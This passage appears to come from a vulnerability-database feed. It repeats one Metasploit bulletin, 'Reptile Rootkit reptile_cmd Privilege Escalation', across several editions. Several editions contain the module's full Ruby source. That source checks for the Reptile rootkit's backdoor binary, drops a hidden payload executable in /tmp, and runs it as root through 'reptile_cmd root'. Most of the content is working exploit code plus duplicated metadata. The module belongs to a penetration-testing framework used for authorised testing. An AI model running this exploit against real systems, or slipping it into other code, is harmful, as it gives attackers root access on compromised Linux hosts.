'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-08T22:47:36", "differentElements": ["sourceData"], "edition": 96}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-09T08:07:22", "history": [], "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:68867358F68945E1EC52FB85F54D1C73"]}, {"type": "kitploit", "idList": ["KITPLOIT:7911624999684183113"]}, {"type": "schneier", "idList": ["SCHNEIER:D1AE4268FCD5C4A5F5FB8B752F47E549"]}, {"type": "mskb", "idList": ["KB3191777", "KB3162835", "KB3190029", "KB4016126", "KB3051169", "KB933360", "KB4016125", "KB2158563", "KB2443685", "KB4459897"]}], "modified": "2020-04-09T08:07:22", "rev": 2}, "score": {"value": 2.2, "vector": "NONE", "modified": "2020-04-09T08:07:22", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-09T08:07:22", "differentElements": ["sourceData"], "edition": 97}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-09T19:57:34", "history": [], "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0494-1", "OPENSUSE-SU-2020:0500-1", "OPENSUSE-SU-2020:0506-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:2268350346393093680"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1334", "ELSA-2020-1420", "ELSA-2020-1338"]}, {"type": "virtuozzo", "idList": ["VZA-2020-029"]}, {"type": "cve", "idList": ["CVE-2020-11669", "CVE-2020-9056"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "threatpost", "idList": ["THREATPOST:21DF66AF86275791A0EC6202B8ACAE10"]}, {"type": "mskb", "idList": ["KB2400367", "KB318202", "KB2905616", "KB937287", "KB2571841", "KB2919355", "KB2986475"]}], "modified": "2020-04-09T19:57:34", "rev": 2}, "score": {"value": 4.3, "vector": "NONE", "modified": "2020-04-09T19:57:34", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-09T19:57:34", "differentElements": ["sourceData"], "edition": 98}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-12T21:55:13", "history": [], "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:2268350346393093680", "KITPLOIT:481829449701326862"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0506-1", "OPENSUSE-SU-2020:0500-1", "OPENSUSE-SU-2020:0494-1", "OPENSUSE-SU-2020:0512-1"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2020-3_0-0073_PYTHON3.NASL", "PHOTONOS_PHSA-2020-3_0-0073_LINUX.NASL", "PHOTONOS_PHSA-2020-3_0-0073_PYTHON2.NASL", "PHOTONOS_PHSA-2020-3_0-0073_ZSH.NASL", "PHOTONOS_PHSA-2020-3_0-0073_BLUEZ.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1334", "ELSA-2020-1338", "ELSA-2020-1420"]}, {"type": "virtuozzo", "idList": ["VZA-2020-029"]}, {"type": "cve", "idList": ["CVE-2020-9056", "CVE-2020-11669"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "threatpost", "idList": ["THREATPOST:21DF66AF86275791A0EC6202B8ACAE10"]}], "modified": "2020-04-12T21:55:13", "rev": 2}, "score": {"value": 4.2, "vector": "NONE", "modified": "2020-04-12T21:55:13", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-12T21:55:13", "differentElements": ["sourceData"], "edition": 99}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-13T04:23:00", "history": [], "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:9156489932953397092"]}, {"type": "mskb", "idList": ["KB3114489", "KB3115452", "KB3101365", "KB2160841", "KB3118280", "KB3194720", "KB2489256", "KB3194724", "KB3162593", "KB3054847"]}], "modified": "2020-04-13T04:23:00", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2020-04-13T04:23:00", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-13T04:23:00", "differentElements": ["sourceData"], "edition": 100}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-14T10:23:24", "history": [], "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:9156489932953397092"]}, {"type": "mskb", "idList": ["KB3114489", "KB3115452", "KB3101365", "KB2160841", "KB3118280", "KB3194720", "KB2489256", "KB3194724", "KB3162593", "KB3054847"]}], "modified": "2020-04-13T04:23:00", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2020-04-13T04:23:00", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-14T10:23:24", "differentElements": ["sourceData"], "edition": 101}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-14T12:38:36", "history": [], "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "mskb", "idList": ["KB4293803"]}, {"type": "cve", "idList": ["CVE-2020-3194", "CVE-2020-0598", "CVE-2020-0600", "CVE-2020-0547", "CVE-2020-2741", "CVE-2020-6992", "CVE-2020-4270", "CVE-2020-2758", "CVE-2020-0568", "CVE-2020-0557"]}, {"type": "threatpost", "idList": ["THREATPOST:7E97781DFEAD4C4E00520DD5D1C6E510", "THREATPOST:809C21975D03CB1FCA25960D52CC98F3", "THREATPOST:D6548A3197394149016B5A93CE061E6B"]}], "modified": "2020-04-14T12:38:36", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2020-04-14T12:38:36", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-14T12:38:36", "differentElements": ["sourceData"], "edition": 102}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-16T16:29:12", "history": [], "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:1493"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:50DBFC71AAA3B1B44D0D892D22C3E33F", "CARBONBLACK:D5145FC8F1931C56C792670B74071D54"]}, {"type": "threatpost", "idList": ["THREATPOST:6C914BB77CA33217C1BCF2FEAC88135F"]}, {"type": "mskb", "idList": ["KB4293803"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201375", "OPENVAS:1361412562311220201468", "OPENVAS:1361412562311220201487", "OPENVAS:1361412562311220201414", "OPENVAS:1361412562311220201434", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201438", "OPENVAS:1361412562311220201460", "OPENVAS:1361412562311220201481"]}], "modified": "2020-04-16T16:29:12", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2020-04-16T16:29:12", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-16T16:29:12", "differentElements": ["sourceData"], "edition": 103}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-16T21:52:44", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1495", "ELSA-2020-5653", "ELSA-2020-5654", "ELSA-2020-1489", "ELSA-2020-1497"]}, {"type": "kitploit", "idList": ["KITPLOIT:3835831876788290423", "KITPLOIT:6369888049214654945"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0534-1"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:A2FF22852785231BD2B16FA55814079E", "PENTESTPARTNERS:B2D55AD828B3CAF54A75592EC7A41C46"]}, {"type": "mskb", "idList": ["KB4494352", "KB4505225"]}, {"type": "cve", "idList": ["CVE-2019-7306"]}, {"type": "amazon", "idList": ["ALAS-2020-1357"]}, {"type": "exploitdb", "idList": ["EDB-ID:48339", "EDB-ID:48343", "EDB-ID:48340"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143722"]}, {"type": "nessus", "idList": ["ADOBE_AFTER_EFFECTS_APSB20-21.NASL"]}], "modified": "2020-04-16T21:52:44", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-04-16T21:52:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => 